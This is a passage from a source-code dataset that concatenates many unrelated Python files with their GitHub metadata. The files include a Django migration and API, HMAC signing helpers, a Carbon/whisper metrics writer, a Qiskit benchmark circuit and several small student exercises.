zip(xDigits[::-1], range(len(xDigits)))])
return xNum
| [
"noreply@github.com"
] | fernandogarcia547.noreply@github.com |
c6a74cae264cfe137887a6a21fcbd3c2a83f69b2 | 0d885803267a021887b512cffb74ffee43e7f6f4 | /exchangeability/bin/parse-results-ml-no-sort.py | 3369a18e19113c420bad1d48b3f90f3dc039037f | [
"CC-BY-4.0"
] | permissive | joaks1/msbayes-experiments | ecc48ac73b35ec5930c48da8716b72b61fc4e62d | 72fcf3c26f6d92bdcc39343372552f45d72d8f7f | refs/heads/master | 2021-01-21T21:43:15.109146 | 2017-11-06T02:11:14 | 2017-11-06T02:11:14 | 12,230,084 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 827 | py | #! /usr/bin/env python
import os
import sys
from pymsbayes.utils.parsing import DMCSimulationResults
from pymsbayes.utils.messaging import get_logger
_LOG = get_logger(__name__)
def main_cli():
    """Parse the multi-locus no-sort simulation results and write summaries."""
    script_dir = os.path.abspath(os.path.dirname(__file__))
    project_root = os.path.abspath(os.path.dirname(script_dir))
    results_root = os.path.abspath(os.path.join(project_root, 'results'))
    info_path = os.path.join(results_root, 'multi-locus-no-sort', 'pymsbayes-results',
            'pymsbayes-info.txt')
    _LOG.info('Parsing and writing results...')
    sim_results = DMCSimulationResults(info_path)
    indices = sim_results.prior_index_to_config.keys()
    sim_results.write_result_summaries(
            prior_indices = indices,
            include_tau_exclusion_info = False)
if __name__ == '__main__':
main_cli()
| [
"joaks1@gmail.com"
] | joaks1@gmail.com |
25687f3071c625cc21d3d7dd48ca14723ceb965a | 1976212e3c44a292060da51ab56453d22cc3f69d | /LP2/AC10/lmsteste/curriculo/migrations/0001_initial.py | 7bfbacd8951faac6e3f2264e02a481260b287ced | [
"Apache-2.0"
] | permissive | luisxfelipe/Faculdade_Impacta_2semestre | 9d2f9a623a6544b42a0a7a21f6b2c6688a54a4df | ad6e0bcc22496bb96f56c5ca3d930554dd5302a4 | refs/heads/master | 2022-12-05T22:19:46.110930 | 2019-05-23T14:47:40 | 2019-05-23T14:47:40 | 170,687,194 | 0 | 0 | Apache-2.0 | 2022-11-22T03:14:30 | 2019-02-14T12:22:57 | Python | UTF-8 | Python | false | false | 4,301 | py | # Generated by Django 2.1.3 on 2018-11-29 00:22
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Auto-generated initial migration for the curriculo app.

    Creates the Curso, Disciplina, DisciplinaOfertada and Turma tables,
    plus their uniqueness constraints and cross-table foreign keys.
    Do not hand-edit the operations below; regenerate with makemigrations.
    """

    initial = True

    # requires the contas app's initial migration (Coordenador/Professor FKs)
    dependencies = [
        ('contas', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Curso',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nome', models.CharField(max_length=255, unique=True)),
                ('sigla', models.CharField(max_length=5, unique=True)),
            ],
        ),
        migrations.CreateModel(
            name='Disciplina',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nome', models.CharField(max_length=255, unique=True)),
                ('data', models.DateField(blank=True, default=django.utils.timezone.now, null=True)),
                ('status', models.CharField(blank=True, default='Aberta', max_length=50, null=True)),
                ('plano_ensino', models.TextField(max_length=500)),
                ('carga_horaria', models.IntegerField()),
                ('competencias', models.TextField(max_length=500)),
                ('habilidades', models.TextField(max_length=500)),
                ('ementa', models.TextField(max_length=500)),
                ('conteudo_programatico', models.TextField(max_length=500)),
                ('bibliografia_basica', models.TextField(max_length=500)),
                ('bibliografia_complementar', models.TextField(max_length=500)),
                ('percentual_pratico', models.IntegerField()),
                ('percentual_teorico', models.IntegerField()),
                ('coordenador', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='contas.Coordenador')),
            ],
        ),
        migrations.CreateModel(
            name='DisciplinaOfertada',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('dt_inicio_matricula', models.DateField()),
                ('dt_fim_matricula', models.DateField()),
                ('metodologia', models.TextField(blank=True, default=None, max_length=500, null=True)),
                ('recursos', models.TextField(blank=True, default=None, max_length=500, null=True)),
                ('criterio_avaliacao', models.TextField(blank=True, default=None, max_length=500, null=True)),
                ('plano_aulas', models.TextField(blank=True, default=None, max_length=500, null=True)),
                ('coordenador', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='contas.Coordenador')),
                ('curso', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='curriculo.Curso')),
                ('disciplina', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='curriculo.Disciplina')),
                ('professor', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.PROTECT, to='contas.Professor')),
            ],
            options={
                'verbose_name': 'oferta de disciplina',
                'verbose_name_plural': 'ofertas de disciplinas',
            },
        ),
        migrations.CreateModel(
            name='Turma',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('ano', models.IntegerField()),
                ('semestre', models.IntegerField()),
                ('nome', models.CharField(max_length=1)),
            ],
        ),
        migrations.AlterUniqueTogether(
            name='turma',
            unique_together={('ano', 'semestre', 'nome')},
        ),
        # the Turma FK is added after both tables exist, then made part of
        # the DisciplinaOfertada uniqueness constraint
        migrations.AddField(
            model_name='disciplinaofertada',
            name='turma',
            field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='curriculo.Turma'),
        ),
        migrations.AlterUniqueTogether(
            name='disciplinaofertada',
            unique_together={('disciplina', 'curso', 'turma')},
        ),
    ]
| [
"luis.felipe-simoes@outlook.com"
] | luis.felipe-simoes@outlook.com |
5114e9fb9e89b7c121fe36ba7adffd2c63ca57fb | 1f5299e547125f7ba2c3b72984e82ba3b1f984de | /basejumper/security.py | ad0e4a6b627153a5f150932198651845b40573cd | [] | no_license | ESGF/basejump | 72b805818188ae09b1e3329035718b0816927a13 | 593d5e57e63848c30219ca9b49e25f49b59dcf82 | refs/heads/master | 2021-07-23T04:19:57.489628 | 2017-11-02T16:51:52 | 2017-11-02T16:51:52 | 47,994,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 908 | py | import hmac
import hashlib
import json
import collections
def constant_time_compare(val1, val2):
    """Compare two strings in time independent of where they first differ.

    The length check is allowed to leak (mismatched lengths return False
    immediately); for equal lengths every character pair is inspected.
    """
    if len(val1) != len(val2):
        return False
    # sum() does not short-circuit, so the whole string is always scanned;
    # the total is zero iff every XOR is zero, i.e. the strings are equal
    mismatch = sum(ord(ch1) ^ ord(ch2) for ch1, ch2 in zip(val1, val2))
    return mismatch == 0
def hmac_compare(key, msg, known):
    """Return True if HMAC-SHA256(key, msg) equals the *known* hex digest.

    Fix: Python 3's hmac.new only accepts bytes, so str inputs are UTF-8
    encoded first (bytes pass through unchanged, preserving Python 2
    behaviour where str already is bytes).
    """
    if not isinstance(key, bytes):
        key = key.encode("utf-8")
    if not isinstance(msg, bytes):
        msg = msg.encode("utf-8")
    h = hmac.new(key, msg, hashlib.sha256)
    return constant_time_compare(h.hexdigest(), known)
def get_dict_signature(dictionary, key):
    """Return a hex HMAC-SHA256 signature over the dict's keys and values.

    Each key and the str() of its value are fed to the HMAC in sorted-key
    order, so equal dicts always produce equal signatures.

    Fix: Python 3's HMAC update() only accepts bytes, so str inputs are
    UTF-8 encoded first (bytes pass through unchanged, keeping the digest
    identical to the Python 2 version for ASCII data).
    """
    if not isinstance(key, bytes):
        key = key.encode("utf-8")
    h = hmac.new(key, digestmod=hashlib.sha256)
    for k in sorted(dictionary.keys()):
        h.update(k if isinstance(k, bytes) else k.encode("utf-8"))
        value = str(dictionary[k])
        h.update(value if isinstance(value, bytes) else value.encode("utf-8"))
    return h.hexdigest()
def check_json_sig(dictionary, key, signature):
    """Return True when *signature* matches the dict's computed signature."""
    expected = get_dict_signature(dictionary, key)
    return constant_time_compare(expected, signature)
def sign_path(path, key):
    """Return the hex HMAC-SHA256 digest of *path* under *key*.

    Fix: Python 3's hmac.new only accepts bytes, so str inputs are UTF-8
    encoded first (bytes pass through unchanged).
    """
    if not isinstance(key, bytes):
        key = key.encode("utf-8")
    if not isinstance(path, bytes):
        path = path.encode("utf-8")
    h = hmac.new(key, path, hashlib.sha256)
    return h.hexdigest()
| [
"fries2@llnl.gov"
] | fries2@llnl.gov |
c433ae0599808eb1ea13010018c8a7e094198719 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/63/usersdata/189/29190/submittedfiles/swamee.py | 3b19ef457ff49af07dc44e820878bdc4c334e957 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 414 | py | # -*- coding: utf-8 -*-
import math
f= float(input('digite f:'))
l= float(input('digite l:'))
q= float(input('digite q:'))
delta= float(input('digite delta:'))
v= float(input('digite v:'))
d=(8*f*l*(q*q)/3.14159**2*9.81*delta)/(1/5)
rey=((4*q)/(3.14159*d*v))
k=0.25/(math.log10(0.000002/3.7*d+5.74/rey**0.9))**2
print('O valor de D é %.4f' %d)
print('O valor de Rey é %.4f' %rey)
print('O valor de K é %.4f' %k) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
e54ad01c09d5f78376da8b5cbb41acdcd81a7a0e | caeecdf46b10a652ad93152146f0983694766e9d | /openeducat_noticeboard/models/notice_board.py | fde0bde44cb117055c2209050c0f1d5dc7c15022 | [] | no_license | aneesfathima/school_management | 010e4bee57b2aea9863ba7d1ecbbfa28182f3ecc | eda2d7699a1110ad903041abdce31aa4da296e9b | refs/heads/master | 2021-01-06T09:47:43.945540 | 2020-02-18T06:54:03 | 2020-02-18T06:54:03 | 241,285,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | # -*- coding: utf-8 -*-
import datetime
import time
import calendar
from odoo import http, fields
from odoo.http import request
from odoo import models, fields, api
class openeducat_noticeboard(models.Model):
    """Notice board entry: a titled announcement with body text and a timestamp."""
    _name = 'openeducat_noticeboard.noticeboard'

    title = fields.Char('Title', required=True)
    content = fields.Text('Content')
    # NOTE(review): presumably the moment the notice applies/was posted -- confirm intended use
    time = fields.Datetime('Date And Time')
| [
"noreply@github.com"
] | aneesfathima.noreply@github.com |
c4aa501029ce3d847f0c6daa42556caa5f1b5f4d | 3bf004648ac22448cef6912e775bab46148d0978 | /zr/api.py | 07b831456d5f847e892d30b1a57c348e10ca63d0 | [] | no_license | ncats/zebra_rank | 2f5959cf1886318b66a8b464095156ea4ee7aece | d8fd697c54941cf0739dc0e1a68642113202cadf | refs/heads/master | 2022-11-28T03:11:01.070696 | 2020-08-07T21:39:34 | 2020-08-07T21:39:34 | 281,787,726 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,171 | py | from django.http import HttpResponse, Http404
from django.views.decorators.csrf import csrf_exempt
import json, re, sys, logging, traceback
from . import rank_phenotypes as rp
logger = logging.getLogger(__name__)
# Pre-loaded ranking models, one per disease vocabulary; loaded once at
# import time from their weight files.
ORPHANET = rp.ZebraRank('weights_disease_S_ORDO_ORPHANET.json',
                        'weights_phenotype_S_ORDO_ORPHANET.json')
GARD = rp.ZebraRank('weights_disease_S_GARD.json',
                    'weights_phenotype_S_GARD.json')

# Public source names accepted by the API endpoints, mapped to their models.
data_sources = {
    'orphanet': ORPHANET,
    'gard': GARD
}
def index(request):
    """Root endpoint: plain-text banner identifying the ZebraRank API."""
    return HttpResponse('This is the API for ZebraRank', status=200)
def sources(request):
    """Return the available data source names as a JSON array."""
    return HttpResponse(json.dumps(list(data_sources.keys()), indent=2),
                        content_type='application/json', status=200)
def phenotypes(request, name):
    """Substring-search the known phenotype names and return matches as JSON.

    Query parameters:
        skip -- number of ranked matches to drop (default 0)
        max  -- maximum number of matches to return (default 10)

    Matches are ranked by pos * len(text): earlier hits in shorter names first.
    """
    # renamed local from "max" to "limit" so the builtin max() is not shadowed
    limit = int(request.GET.get('max', 10))
    skip = int(request.GET.get('skip', 0))
    name = name.lower()
    matches = []
    for hp in rp.ZebraRank.PHENOTYPES.values():
        phenotype = hp['name']
        match = None
        if isinstance(phenotype, list):
            # some entries carry several synonyms; keep the first that matches
            for n in phenotype:
                m = n.lower().find(name)
                if m >= 0:
                    match = {
                        'id': hp['id'],
                        'text': n,
                        'pos': m
                    }
                    break
        else:
            m = phenotype.lower().find(name)
            if m >= 0:
                match = {
                    'id': hp['id'],
                    'text': phenotype,
                    'pos': m
                }
        if match:
            matches.append(match)
    if len(matches) > 0:
        matches = sorted(
            matches, key = lambda x : x['pos']*len(x['text']))[skip:skip+limit]
    results = {
        'query': name,
        'results': matches
    }
    return HttpResponse(json.dumps(results, indent=2),
                        content_type='application/json', status=200)
@csrf_exempt
def zebra_rank(request, source):
    """Rank diseases from *source* against a set of phenotype identifiers.

    GET:  phenotypes passed as a comma-separated "phenotypes" parameter.
    POST: phenotypes passed as a JSON array in the request body.

    Returns a JSON list of {score, disease, matched_phenotypes} records.
    """
    phenotypes = []
    if request.method == 'GET':
        if 'phenotypes' in request.GET:
            phenotypes = request.GET['phenotypes'].split(',')
    elif request.method == 'POST':
        try:
            phenotypes = json.loads(request.body)
        except (ValueError, TypeError):
            # ValueError covers json.JSONDecodeError for malformed bodies
            logger.debug("Unexpected error: %s" % sys.exc_info())
            return HttpResponse('Content is not JSON', status=400)

    source = source.lower()
    # validate against the registered sources rather than hard-coded names
    if source not in data_sources:
        return HttpResponse('Unknown source: %s' % source, status=404)

    results = []
    if len(phenotypes) > 0:
        results = data_sources[source].rank_phenotypes_weighted_tfidf(phenotypes)
        results = [{'score': r[0],
                    'disease': r[1],
                    'matched_phenotypes': list(r[2])} for r in results]
    return HttpResponse(json.dumps(results, indent=2),
                        content_type='application/json', status=200)
| [
"caodac@gmail.com"
] | caodac@gmail.com |
8e600ba35e9805cb66645133fcc401dfbef6301f | d2fc8f3d180ad519957b7ebfa2c59cd3c33d52bd | /las/bin/run.py | 89cfc39f3dbb0a363490a159f117d60823d389de | [] | no_license | 0xAlwaysDumpling/PhraseVectorExperiment | 6a03a97f41a5445659f457876bbb028b1c07db0b | 95839261847186a58e930f83bb830854e1be1ad4 | refs/heads/master | 2022-07-29T20:18:06.166146 | 2016-11-06T23:38:36 | 2016-11-06T23:38:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,290 | py | __author__ = 'Johnny'
import sys,os,inspect
ff_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"../model/feedforward/")))
cnn_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"../model/cnn/")))
if ff_subfolder not in sys.path:
sys.path.insert(0, ff_subfolder)
if cnn_subfolder not in sys.path:
sys.path.insert(0, cnn_subfolder)
import singlelayer as sln
import multilayer as mln
import cnn as cn
def main():
name = sys.argv[1]
batch_size = sys.argv[2]
end_epoch = sys.argv[3]
hidden_units = sys.argv[4]
hidden_layers = sys.argv[5]
Sampling = sys.argv[6]
X_train_path = sys.argv[7]
Y_train_path = sys.argv[8]
eval_path = sys.argv[9]
if str(name) == 'sln':
feed_forward = sln.ff(name,batch_size,hidden_units,1,end_epoch)
feed_forward.run(Sampling,X_train_path,Y_train_path, eval_path)
elif name == 'cnn':
cnn_net = cn.cnn(name,batch_size,hidden_units,1,end_epoch)
cnn_net.run(Sampling,X_train_path,Y_train_path, eval_path)
elif name == 'mln':
feed_forward = mln.ff(name,batch_size,hidden_units,hidden_layers,end_epoch)
feed_forward.run(Sampling,X_train_path,Y_train_path, eval_path)
if __name__ == '__main__':
main()
| [
"jhnnytny@gmail.com"
] | jhnnytny@gmail.com |
f604575cfbcc7e91c6864a85feb5527cce1b9e01 | 2489f15231913f423d3c528b61dc121447eb4875 | /models.py | 00c31866979ba38e21880d6e62708c868778effc | [] | no_license | JBarmentlo/Remote-Control-DB | 0f92ed1e87120bb1504b00e78da0462e2cb63266 | 9181765c3f16c4d116945d353eec56ebd86a74f5 | refs/heads/main | 2023-04-14T03:45:07.246007 | 2021-04-26T09:11:12 | 2021-04-26T09:11:12 | 357,155,247 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,876 | py | from init import db
from sqlalchemy.types import String, TypeDecorator
import datetime
class HexByteString(TypeDecorator):
"""Convert Python bytestring to string with hexadecimal digits and back for storage."""
impl = String
def process_bind_param(self, value, dialect):
if not isinstance(value, bytes):
raise TypeError("HexByteString columns support only bytes values.")
return value.hex()
def process_result_value(self, value, dialect):
return bytes.fromhex(value) if value else None
class User(db.Model):
__tablename__ = 'users'
# id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(), primary_key=True)
pas = db.Column(HexByteString)
mail = db.Column(db.String())
authenticated = db.Column(db.Boolean, default=False)
# tasks = relationship("Task")
def __init__(self, username, pas, mail, authenticated = False):
self.username = username
self.pas = pas
self.mail = mail
self.authenticated = authenticated
def is_active(self):
"""True, as all users are active."""
return True
def get_id(self):
"""Return the username to satisfy Flask-Login's requirements."""
return self.username
def is_authenticated(self):
"""Return True if the user is authenticated."""
return self.authenticated
def is_anonymous(self):
"""False, as anonymous users aren't supported."""
return False
def __repr__(self):
return '<user {}>'.format(self.username)
class Task(db.Model):
__tablename__ = 'tasks'
task_id = db.Column(db.Integer(), primary_key = True)
task = db.Column(db.String())
username = db.Column(db.String())
status = db.Column(db.String())
date = db.Column(db.String())
start_date = db.Column(db.String())
end_date = db.Column(db.String())
# user = db.Column(sb.String, ForeignKey('users.username'))
def __init__(self, task_id, task, username, status = "pending", start_date = "", end_date = ""):
self.id = task_id
self.task = task
self.username = username
self.status = status
self.date = str(datetime.datetime.now())
self.start_date = start_date
self.end_date = end_date
self.set_run_time()
def get_run_time(self):
try:
return str(datetime.datetime.strptime(self.end_date, '%Y-%m-%d %H:%M:%S.%f') - datetime.datetime.strptime(self.start_date, '%Y-%m-%d %H:%M:%S.%f')).split('.')[0]
except:
return ""
def set_run_time(self):
try:
self.execution_time = str(datetime.datetime.strptime(self.end_date, '%Y-%m-%d %H:%M:%S.%f') - datetime.datetime.strptime(self.start_date, '%Y-%m-%d %H:%M:%S.%f')).split('.')[0]
except:
self.execution_time = "" | [
"joepbarmentlo@gmail.com"
] | joepbarmentlo@gmail.com |
f5308c737fb3468863c69513b0b3872646c9da83 | f9bc9f5b713a49ae4c3ad726d6a57d48dd3360ff | /test2.py | 4631b48fbe4e8d088f717dc1a7c69e0f52f2df84 | [] | no_license | ahrooran/python-commands | 0203216cf601229325398a15ea1f9f5474853729 | a9d540f9b1f6b098c93f002a8df1fa570d1c022f | refs/heads/master | 2020-05-26T21:49:35.162250 | 2019-06-02T14:47:06 | 2019-06-02T14:47:06 | 188,386,886 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 517 | py |
print("Enter your marks:")
p = int(input("What's your marks for Physics? "))
c = int(input("What's your marks for Chemistry? "))
m = int(input("What's your marks Maths? "))
total = p+c+m
per=total*100/450
outof=150*3
print("----------------MARKS----------------")
print("Physics:", p)
print("Chemistry:", c)
print("Maths:", m)
print("-------------------------------------")
print("Total:", total, "out of", outof)
print("Percentage:", per,"%")
print("-------------------------------------")
| [
"noreply@github.com"
] | ahrooran.noreply@github.com |
3e2adce14d0306263670dc98a5d4ce21d48cf953 | 777e913ab14043774bcd1ce839bffca12efba424 | /home/sum-numbers.py | b5371413b384f99454a8a7408ecbc898414e83c5 | [] | no_license | PetrStar/py.checkio.org | 4e2c5c8d2045ecfa228e53645ec0dde78f7d253c | 83ec499baf874707e3f49910a2499c37d76b195b | refs/heads/main | 2023-01-23T15:14:58.031805 | 2020-12-03T19:57:51 | 2020-12-03T19:57:51 | 318,291,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 676 | py | def sum_numbers(text: str) -> int:
return sum([int(word) for word in text.split() if word.isdigit()])
if __name__ == '__main__':
print("Example:")
print(sum_numbers('hi'))
# These "asserts" are used for self-checking and not for an auto-testing
assert sum_numbers('hi') == 0
assert sum_numbers('who is 1st here') == 0
assert sum_numbers('my numbers is 2') == 2
assert sum_numbers('This picture is an oil on canvas '
'painting by Danish artist Anna '
'Petersen between 1845 and 1910 year') == 3755
assert sum_numbers('5 plus 6 is') == 11
assert sum_numbers('') == 0
print("Coding complete? Click 'Check' to earn cool rewards!")
| [
"noreply@github.com"
] | PetrStar.noreply@github.com |
8bafb18de3c09b4e845ad8d2df44676d5617bfad | 3e3743928f43aaef5cfb72e257b6f091fc2a39cb | /src/whirlwind/tornado/carbon/persist.py | 6a4360ba75d08129ad746ac60e9c350f75c12a51 | [
"Apache-2.0"
] | permissive | bearstech/whirlwind-tornado | 3871862944f584816a1d90891cec815f64209e14 | 85b9e6b4b3413694cb6e5040ce5c72b6e5e436ac | refs/heads/master | 2021-01-18T14:10:05.666763 | 2020-10-13T09:47:05 | 2020-10-13T09:47:05 | 10,527,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,992 | py | import time
import struct
import os.path
import os
import whisper
from redis import StrictRedis as Redis
from whirlwind import target_to_path
METRICS = 'metrics'
PERIOD = 30
METRIC_WRITE = 'carbon.write'
METRIC_POINTS = 'carbon.points'
class Persist(object):
    """ Sequential writer for Carbon server.

    The story is simple: fetch pending points from redis, write them to
    their whisper files, wait out the rest of the period, loop.
    This code is supervised by the Carbon daemon.
    """
    def __init__(self, path="/tmp/"):
        # path: root directory under which whisper files are created.
        self.redis = Redis()
        self.path = path
        self.dirs = set()  # cache of directories already known to exist
        # Register our own metrics so handle() flushes them too.
        self.redis.sadd(METRICS, METRIC_POINTS, METRIC_WRITE)

    def metric(self, name, value):
        "Add some metrics : make your own dogfood, just before lunch."
        timestamp = time.time()
        # NOTE(review): '!ff' packs the timestamp as a 32-bit float, which
        # cannot represent current epoch seconds exactly — confirm intended.
        serialized = struct.pack('!ff', timestamp, value)
        pipe = self.redis.pipeline()
        # redis-py 2.x StrictRedis order: score first, then member.
        pipe.zadd(name, timestamp, serialized)
        pipe.publish(name, serialized)
        pipe.execute()

    def run(self):
        """Flush loop: drain pending points roughly every PERIOD seconds."""
        while True:
            before = time.time()
            self.handle()
            after = time.time()
            self.metric(METRIC_WRITE, (after - before) * 1000)
            # Sleep only what remains of the period. The previous code
            # computed PERIOD - int(before) + int(after), i.e. PERIOD plus
            # the elapsed time, so every cycle overshot the period (and a
            # fixed cadence was clearly intended). Clamp at 0 so a slow
            # handle() pass cannot produce a negative sleep.
            time.sleep(max(0, PERIOD - (after - before)))

    def handle(self):
        """Write every queued point to its whisper file, then clear redis."""
        points = 0
        for metric in self.redis.smembers(METRICS):
            values = self.redis.zrange(metric, 0, -1)
            points += len(values)
            f = target_to_path(self.path, metric)
            d = os.path.dirname(f)
            # Create the parent directory once and remember it.
            if d not in self.dirs:
                if not os.path.isdir(d):
                    os.makedirs(d)
                self.dirs.add(d)
            if not os.path.exists(f):
                whisper.create(f, [(10, 1000)])  # [FIXME] hardcoded values
            whisper.update_many(f, [struct.unpack('!ff', a) for a in values])
            if len(values):
                # Only remove what we actually read, so points queued while
                # writing are kept for the next cycle.
                self.redis.zrem(metric, *values)
        self.metric(METRIC_POINTS, points)
if __name__ == "__main__":
    # Entry point when launched under the Carbon daemon supervisor.
    p = Persist()
    p.run()
| [
"mlecarme@bearstech.com"
] | mlecarme@bearstech.com |
cc4e5646eb53c6b3516812713e6eb457669665f5 | 2e0ea50b016dc3c01bbaca98dd6806d5a1500b47 | /chart.py | 9240adcd3b56a13793c617d63f3fa0f40a75a789 | [] | no_license | ukey123/kusai | d55247826f7323ad534224cd022a3dc0495b3030 | dfe74c2144a09b0480ab95beb4b8171d714c97bd | refs/heads/main | 2023-02-17T08:59:54.224192 | 2021-01-18T06:00:46 | 2021-01-18T06:00:46 | 319,865,503 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,340 | py | #!/usr/bin/pythonCGI
# -*- coding: utf-8 -*-
from jinja2 import Environment, FileSystemLoader
import sqlite3
import datetime
def mychart(environ, start_response):
    """WSGI application: render the odor-level ("kusai") chart page.

    Reads every (timestamp, value) row from the sqlite ``kusai`` table and
    hands them to the Jinja2 template as ``kusai_list``. Returns the page
    as a single UTF-8 byte string.
    """
    env = Environment(loader=FileSystemLoader('/home/pi/Desktop/kusai/', encoding='utf8'))
    tpl = env.get_template('template.html')
    # Data handed to the template.
    title = u"臭いチャート"
    temp_list = []
    dbpath = '/home/pi/logging'
    connection = sqlite3.connect(dbpath)
    # Autocommit mode; this handler only reads.
    connection.isolation_level = None
    try:
        cursor = connection.cursor()
        # Timestamps as epoch milliseconds for the client-side chart library.
        # (Append "where t > datetime('now', '-24 hours')" to limit to a day.)
        sql = "select 1000 * strftime('%s' , t), v from kusai"
        cursor.execute(sql)
        records = cursor.fetchall()
        for record in records:
            temp_list.append({'date': record[0], 'kusai': record[1]})
        cursor.close()
    finally:
        # Always release the connection, even if the query fails
        # (the original leaked it on any exception).
        connection.close()
    html = tpl.render({'title': title, 'kusai_list': temp_list})
    start_response('200 OK', [('Content-Type', 'text/html')])
    return [html.encode('utf-8')]
if __name__ == '__main__':
    # Serve the WSGI app over FastCGI (expects a front web server speaking FCGI).
    from flup.server.fcgi import WSGIServer
    WSGIServer(mychart).run()
| [
"noreply@github.com"
] | ukey123.noreply@github.com |
dc49aee3b646e4e2864be55fd34519a351e9c3ad | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p4VQE/R1/benchmark/startQiskit_noisy83.py | 997aaa1938fcb497d01eab2eff9be00509126ac8 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,391 | py | # qubit number=3
# total number=9
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
import networkx as nx
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def make_circuit(n:int) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
prog = QuantumCircuit(input_qubit)
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
for edge in E:
k = edge[0]
l = edge[1]
prog.cp(-2 * gamma, input_qubit[k-1], input_qubit[l-1])
prog.p(gamma, k)
prog.p(gamma, l)
prog.rx(2 * beta, range(len(V)))
prog.swap(input_qubit[1],input_qubit[0]) # number=5
prog.swap(input_qubit[1],input_qubit[0]) # number=6
prog.y(input_qubit[2]) # number=7
prog.y(input_qubit[2]) # number=8
# circuit end
return prog
if __name__ == '__main__':
    # Problem instance: a 4-vertex graph with five unit-weight edges.
    n = 4
    V = np.arange(0, n, 1)
    E = [(0, 1, 1.0), (0, 2, 1.0), (1, 2, 1.0), (3, 2, 1.0), (3, 1, 1.0)]

    G = nx.Graph()
    G.add_nodes_from(V)
    G.add_weighted_edges_from(E)

    # Grid-search the analytic expectation F1 over (gamma, beta) in [0, pi).
    step_size = 0.1
    a_gamma, a_beta = np.meshgrid(np.arange(0, np.pi, step_size),
                                  np.arange(0, np.pi, step_size))
    F1 = 3 - (np.sin(2 * a_beta) ** 2 * np.sin(2 * a_gamma) ** 2
              - 0.5 * np.sin(4 * a_beta) * np.sin(4 * a_gamma)) * (1 + np.cos(4 * a_gamma) ** 2)

    # First grid point attaining the maximum defines the working angles.
    best = next(zip(*np.where(F1 == np.amax(F1))))
    gamma = best[0] * step_size
    beta = best[1] * step_size

    prog = make_circuit(4)
    sample_shot = 5200

    with open("../data/startQiskit_noisy83.csv", "w") as writefile:
        # prog.draw('mpl', filename=(kernel + '.png'))
        # Simulated noisy 5-qubit device.
        backend = FakeYorktown()
        circuit1 = transpile(prog, FakeYorktown())
        circuit1.measure_all()
        prog = circuit1

        info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()

        print(info, file=writefile)
        print("results end", file=writefile)
        print(circuit1.depth(), file=writefile)
        print(circuit1, file=writefile)
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
bf9e83df90253e691d8d6d38926265f6665da03b | 4124e6d1a99b40e3e990915969899ba0ddfa9390 | /kaldi/feat/signal.py | 195e85ab397bed43abb22de02e195fa619ca6846 | [
"LicenseRef-scancode-proprietary-license",
"Apache-2.0"
] | permissive | pykaldi/pykaldi | 23f0554072e99fbfa036be27a1b4d1e08f719525 | b482f79a334383a16a3805d658aa221ca3d23c6d | refs/heads/master | 2023-03-10T06:02:38.465779 | 2022-05-29T21:24:42 | 2022-05-29T21:24:42 | 94,806,200 | 1,019 | 283 | Apache-2.0 | 2022-09-18T13:34:33 | 2017-06-19T18:05:19 | Python | UTF-8 | Python | false | false | 236 | py | from ._resample import *
from ._signal import *
################################################################################
# Re-export every public name pulled in by the wildcard imports above,
# excluding the pybind wrapper classes whose names end in "Base".
__all__ = [name for name in dir() if name[0] != '_' and not name.endswith('Base')]
| [
"dogancanbaz@gmail.com"
] | dogancanbaz@gmail.com |
